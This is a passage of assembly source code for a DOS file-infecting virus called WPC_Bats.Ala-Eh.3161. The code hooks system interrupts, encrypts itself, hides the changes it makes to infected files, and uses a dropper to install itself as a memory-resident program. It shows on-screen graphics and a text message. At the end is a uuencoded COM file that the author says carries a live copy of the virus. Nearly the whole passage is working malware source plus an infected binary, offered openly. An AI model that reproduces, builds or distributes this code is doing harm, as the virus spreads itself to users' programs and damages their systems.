call RestoreFileAttribute
call ShowAlaehPrompt ; do random show
call RestoreDtaErrInt
call RestoreRegisters
popf
ret
Int24Handler:
mov al,3 ; error int handler
iret
ShowAlaehPrompt:
mov ah,2ch ; get time
call UseDos
cmp dl,10 ; random check for display
je ShowIt
cmp dl,24
je ShowIt
ret
ShowIt:
mov si,offset AlaehPrompt ; do show
mov cx,16
ShowNextChar:
lodsb
mov dl,al
mov ah,2
call UseDos
loop ShowNextChar
ret
CommandCom db 'COMMAND.COM',0
GetFileSlack: ; determine number of bytes needed
xor dx,dx ; to align host length to para
mov cx,16
div cx
or dx,dx
jz NoPadNeeded
sub dx,cx
neg dx
NoPadNeeded:
ret
RestoreFileAttribute:
xor ch,ch
mov cl,_dAttribute[VirusDta]
mov ax,4301h
mov dx,offset VirusAsciiz
call UseDos
ret
RestoreDtaErrInt:
mov ah,1ah
lds dx,cs:[ActiveDta] ; restore active dta
call UseDos
mov ax,2524h
lds dx,cs:[Int24] ; restore int 24
call UseDos
ret
PrepareToInfectFile:
mov si,cs
mov ds,si
mov ah,2fh
call UseDos
mov [DtaOffset],bx ; save active dta
mov [DtaSegment],es
mov ax,3524h
call UseDos
mov [Int24Offset],bx ; save int 24
mov [Int24Segment],es
mov es,si
mov ax,2524h
mov dx,offset Int24Handler
call UseDos ; hook int 24
mov ah,1ah
mov dx,offset VirusDta
call UseDos ; set virus dta
mov ah,2eh
xor dl,dl
xor al,al
call UseDos ; turn verify off
mov dx,offset VirusAsciiz
mov ah,4eh
mov cx,23h
call UseDos ; find file = get file data
ret
GetInfectedFileSavedHost:
mov al,2
call MovePointerZeroLoHi ; get file length
jc ErrorOnGetFileSavedHost
mov word ptr _dLoLen[VirusDta],ax ; and save it
mov word ptr _dHiLen[VirusDta],dx
sub ax,(offset Timer - offset SavedHost)
sbb dx,0
mov cx,dx
mov dx,ax
xor al,al
call MovePointer ; set to saved host data
jc ErrorOnGetFileSavedHost
mov cx,46
mov dx,offset StealthBuffer
mov ah,3fh
call UseDos ; and read
jc ErrorOnGetFileSavedHost
mov si,offset StealthBuffer
SaveHostFileData: ; save it
mov di,offset SavedHost
mov cx,26
repe movsb
call MaskSavedHostData
clc
ErrorOnGetFileSavedHost:
ret
WriteVirus: ; write an encrypted virus to eof
mov cx,VirLen
mov dx,offset Relocator
mov ah,40h
MaskInt21HandlerBegin:
call MaskInt21Handler
call UseDos
jc ErrorOnWrite
cmp ax,cx
ErrorOnWrite:
call MaskInt21Handler
ret
MovePointerStart: ; multiple entry for move pointer
xor al,al
MovePointerZeroLoHi:
xor dx,dx
MovePointerZeroHi:
xor cx,cx
MovePointer:
mov ah,42h
UseDos:
pushf
cli
db 9ah
Int21 label dword ; old int 21
Int21Offset dw ?
Int21Segment dw ?
ret
;------------------------------------ graphics payload. labels would do the
DrawVerticalPixel: ; explaining for you. hope thats ok
mov bx,23h
VerticalPixelLoop:
call WritePixel
inc dx
dec bx
jnz VerticalPixelLoop
ret
DrawHorizontalPixel:
mov bx,23h
HorizontalPixelLoop:
call WritePixel
inc cx
dec bx
jnz HorizontalPixelLoop
ret
WritePixel:
mov ax,0c0fh ;write graphic pixel at cx:dx
int 10h
ret
ShowAlaehGraphics:
call SaveRegisters
push cs
pop ds
mov ax,0eh ; switch to video mode 0Eh
int 10h ; 640 x 200 color graphics ega/vga
mov cx,235
mov dx,55
mov bx,4bh
DrawLeftLegA_ALF:
call WritePixel
inc dx
dec cx
dec bx
jnz DrawLeftLegA_ALF
mov cx,323
mov dx,55
mov bx,4bh
DrawVertLineL_ALF:
call WritePixel
inc dx
dec bx
jnz DrawVertLineL_ALF
dec dx
mov bx,2dh
DrawHorizLineL_ALF:
call WritePixel
add cx,2
dec bx
jnz DrawHorizLineL_ALF
mov cx,420
mov bx,4bh
DrawVertLineF_ALF:
call WritePixel
dec dx
dec bx
jnz DrawVertLineF_ALF
mov bx,28h
DrawTopHorizLineF_ALF:
call WritePixel
add cx,2
dec bx
jnz DrawTopHorizLineF_ALF
mov di,6
mov si,offset VerticalData
DrawVerticals_AlaEh:
lodsw
mov dx,ax
lodsw
mov cx,ax
call DrawVerticalPixel
dec di
jnz DrawVerticals_AlaEh
mov cx,235
mov dx,55
mov bx,4bh
DrawRightLegA_ALF:
call WritePixel
inc dx
inc cx
dec bx
jnz DrawRightLegA_ALF
mov si,offset HorizontalData
mov di,7
DrawHorizontals_AlaEh:
lodsw
mov cx,ax
lodsw
mov dx,ax
call DrawHorizontalPixel
dec di
jnz DrawHorizontals_AlaEh
mov dx,82
mov cx,430
mov bx,0ch
DrawExclamationLoop1:
call WritePixel
add dx,2
inc cx
dec bx
jnz DrawExclamationLoop1
mov bx,0dh
DrawExclamationLoop2:
call WritePixel
sub dx,2
inc cx
dec bx
jnz DrawExclamationLoop2
mov bx,0ch
DrawExclamationLoop3:
sub cx,2
call WritePixel
dec bx
jnz DrawExclamationLoop3
mov cx,435
mov dx,109
mov bx,7
DrawExclamationLoop4:
call WritePixel
add cx,2
dec bx
jnz DrawExclamationLoop4
mov bx,3
DrawExclamationLoop5:
call WritePixel
add dx,2
dec bx
jnz DrawExclamationLoop5
mov dx,114
mov bx,7
DrawExclamationLoop6:
call WritePixel
sub cx,2
dec bx
jnz DrawExclamationLoop6
mov bx,3
DrawExclamationLoop7:
call WritePixel
sub dx,2
dec bx
jnz DrawExclamationLoop7
mov cx,160
mov dx,120
mov bx,0a0h
DrawExclamationLoop8:
call WritePixel
add cx,2
dec bx
jnz DrawExclamationLoop8
mov cx,302
mov dx,100
mov bx,0fh
DrawExclamationLoop9:
call WritePixel
inc cx
dec bx
jnz DrawExclamationLoop9
mov bx,32h
DelayLoop:
mov cx,-1
loop $
dec bx
jnz DelayLoop
mov ah,0 ; restore video mode
mov al,[VideoMode]
int 10h
call RestoreRegisters
ret
ShowAlaehMessage:
call SaveRegisters
mov ax,40h
mov es,ax
test word ptr es:[TimerTick],1 ; randomize display
jnz DoneShowMess
push cs
pop ds
dec byte ptr [F1KeypressCount] ; got keypress count
jnz DoneShowMess
mov [F1KeypressCount],1 ; reset to 1
;<-------------------------------------- there should be a NOP here
mov ax,0b000h
cmp byte ptr [VideoMode],7
je UseMonoScreenMem ; do screen write for diplay
mov ax,0b800h
UseMonoScreenMem:
mov es,ax
mov di,((((ScrHigh-MesHigh)/2)*ScrWide)+((ScrWide-MesWide)/2))*2
mov si,offset AlaehMessage
GetAnotherMessageChar:
mov ah,es:[di+1]
or ah,15
lodsb
cmp al,13
je DoneShowMess
or al,al
jz ShowNextLine
cmp al,20h
jne UseMessChar
mov ax,es:[di]
UseMessChar:
stosw
jmp GetAnotherMessageChar
ShowNextLine:
add di,(80-37)*2 ; this is (ScrWide-MesWide)*2 but we
jmp GetAnotherMessageChar ; would not get an exact copy of the
DoneShowMess: ; virus if we use this
call RestoreRegisters
ret
Int1cHandler:
pushf
dec cs:[Timer]
jnz PassToOldInt1c ; one hour already?
mov word ptr cs:[Timer],-16 ; reset to one hour
push ax
push es
mov ax,40h
mov es,ax
mov al,es:[MotorState]
test al,15
pop es
pop ax
jnz PassToOldInt1c
call ShowAlaehGraphics ; then show
PassToOldInt1c:
popf
db 0eah
Int1cOffset dw ?
Int1cSegment dw ?
Int16Handler:
pushf
or ah,ah ; get key?
jz GotReadKey
popf
db 0eah
Int16 label dword
Int16Offset dw ?
Int16Segment dw ?
GotReadKey:
popf
pop cs:[Int16CallerOffset]
pop cs:[Int16CallerSegment]
call cs:[Int16]
pushf
cmp ax,3b00h ; is key F1?
jne ReturnToInt16Caller
call ShowAlaehMessage ; show message
ReturnToInt16Caller:
popf
db 0eah
Int16CallerOffset dw ?
Int16CallerSegment dw ?
CommandComFlag db ?
AlaehMessage db 32,32,5 dup (0dch),32,0dch,5 dup (32),5 dup (0dch)
db 5 dup (32),5 dup (0dch),32,0dch,32,32,32,0dch,32,32,0
db 32,0b3h,0dbh,0dch,0dch,0dch,0dbh,0b3h,0dbh,32,32,32,32
db 0b3h,0dbh,0dch,0dch,0dch,0dbh,32,0dch,0dch,32,0b3h,0dbh
db 0dch,0dch,0dch,32,0b3h,0dbh,0dch,0dch,0dch,0dbh,32,32,0
db 32,0b3h,0dbh,0c4h,0c4h,0bfh,0dbh,0b3h,0dbh,0dch,0dch,0dch
db 0dch,0b3h,0dbh,0c4h,0c4h,0bfh,0dbh,32,32,32,32,0b3h,0dbh
db 0dch,0dch,0dch,0dch,0b3h,0dbh,0c4h,0c4h,0bfh,0dbh,32,32,0
db 32,0c0h,0d9h,32,32,0c0h,0d9h,0c0h,0c4h,0c4h,0c4h,0c4h,0d9h
db 0c0h,0d9h,32,32,0c0h,0d9h,32,32,32,32,0c0h,4 dup (0c4h)
db 0d9h,0c0h,0d9h,32,32,0c0h,0d9h,32,32,0
Measure db 6 dup (0c4h),32,'A.R.Jr W P C B A T S ',7 dup (0c4h)
db 13 ;<--------- end of alaeh text delimeter
MesWide equ ($-Measure)-1
MesHigh equ ($-AlaehMessage)/(MesWide+1)
;AlaehMessage db ' ÜÜÜÜÜ Ü ÜÜÜÜÜ ÜÜÜÜÜ Ü Ü ',0
; db ' ³ÛÜÜÜÛ³Û ³ÛÜÜÜÛ ÜÜ ³ÛÜÜÜ ³ÛÜÜÜÛ ',0
; db ' ³ÛÄÄ¿Û³ÛÜÜÜܳÛÄÄ¿Û ³ÛÜÜÜܳÛÄÄ¿Û ',0
; db ' ÀÙ ÀÙÀÄÄÄÄÙÀÙ ÀÙ ÀÄÄÄÄÙÀÙ ÀÙ ',0
;Measure db 'ÄÄÄÄÄÄ A.R.Jr W P C B A T S ÄÄÄÄÄÄÄ',13
;MesWide equ (Int24-Measure)-1
;MesHigh equ ($-AlaehMessage)/(MesWide+1)
TempInt21 label dword
TempInt21Offset dw ?
TempInt21Segment dw ?
Timer dw ?
ReturnPoint dw ?
VideoMode db ?
db ?
F1KeypressCount db ?
ActiveDta label dword
DtaOffset dw ?
DtaSegment dw ?
Int24 label dword
Int24Offset dw ?
Int24Segment dw ?
VirusDta db 45 dup (?)
VirusAsciiz db 65 dup (?)
ComJumpByte equ byte ptr $
ComJumpDisp equ word ptr $+1
ReadBuffer dw 12 dup (?)
db ? ; unused
HandleTable equ $
rept 5
dw -1 ; saved handle
db AsciizLen dup (?) ; saved asciiz
endm
db 5 dup (?) ; dont know whats this for
StealthBuffer db 36 dup (?)
StackFrame db 300 dup (?)
WpcStackPt equ $
align 16
Dropper: ; to avoid any complication, ive setup
cld ; a new dropper. this dropper would
xor ax,ax ; install the virus as low mem tsr.
mov es,ax ; let us leave the dirty work of topmem
les di,dword ptr es:[Ivt7f] ; load to the virus in succeeding gens
mov si,offset Int21Handler ; unless you make changes, you will get
mov cx,5 ; an exact copy of the virus, except if
repe cmpsw ; frisk and drsolomon gets another of
push cs ; their bright ideas on virus detection
pop es
jne Drop1
mov ah,9
mov dx,offset newline
int 21h
call ShowIt
mov ah,9
mov dx,offset newline
int 21h
mov ax,4cffh
int 21h
newline db 7,13,10,'$'
align 2
Drop1:
mov [RelocToVir],offset DecryptEntryCode
mov si,offset AlaehMessage
xor ax,ax
mov bx,ax
Drop2:
lodsb
add bl,al
adc bh,ah
cmp al,13
jne Drop2
mov [AlaehMessageCxSum],bx
mov si,offset EntryCodeMaskBegin
std
Drop3:
mov bx,offset EntryCodeMaskEnd
Drop4:
cmp bx,offset EntryCodeMaskKeyEnd
je Drop3
dec bx
lodsb
xor al,[bx]
mov [si+1],al
cmp si,offset EntryCodeMaskEnd
jne Drop4
call MaskInt21Handler
cld
mov ah,0fh
int 10h
mov [VideoMode],al
mov word ptr [Timer],-16
mov [F1KeypressCount],2
mov ax,3516h
int 21h
mov [Int16Offset],bx
mov [Int16Segment],es
mov ax,351ch
int 21h
mov [Int1cOffset],bx
mov [Int1cSegment],es
mov ax,3521h
int 21h
mov [Int21Offset],bx
mov [Int21Segment],es
push cs
pop es
mov ax,2516h
mov dx,offset Int16Handler
int 21h
mov ax,251ch
mov dx,offset Int1cHandler
int 21h
mov dx,offset Int21Handler
xor ax,ax
mov ds,ax
mov word ptr ds:[Ivt7f],dx
mov word ptr ds:[Ivt7f][2],cs
push cs
pop ds
mov ax,2521h
int 21h
mov ah,9
mov dx,offset newline
int 21h
mov ax,3100h
mov dx,MemRequired+16
int 21h
WpcBatsAlaEh3161 ends
end Relocator
ÄÄ WPCA3161.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The uuencoded file below is infected by a virus created by compiling
the source code above in TASM 2.01. The virus in this file is on the
third generation. The codes of the virus in this file is guaranteed
to be an exact byte-for-byte match of the virus found in the wild.
However, AVs use uninitialized data to determine variations from the
original virus. The values of these far pointers are beyond my
control. If AVs detect this file as having a somewhat different virus
or a not exact identification, then that AV uses uninitialized dat as
determinant for variants.
ÄÄ WPCA3161.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644wpca3161.com
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
,Q,3$Q,3$Q`UJ$!`!
`
end
ÄÄ WPCA3161.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=<{[* HF4 *]}>=-
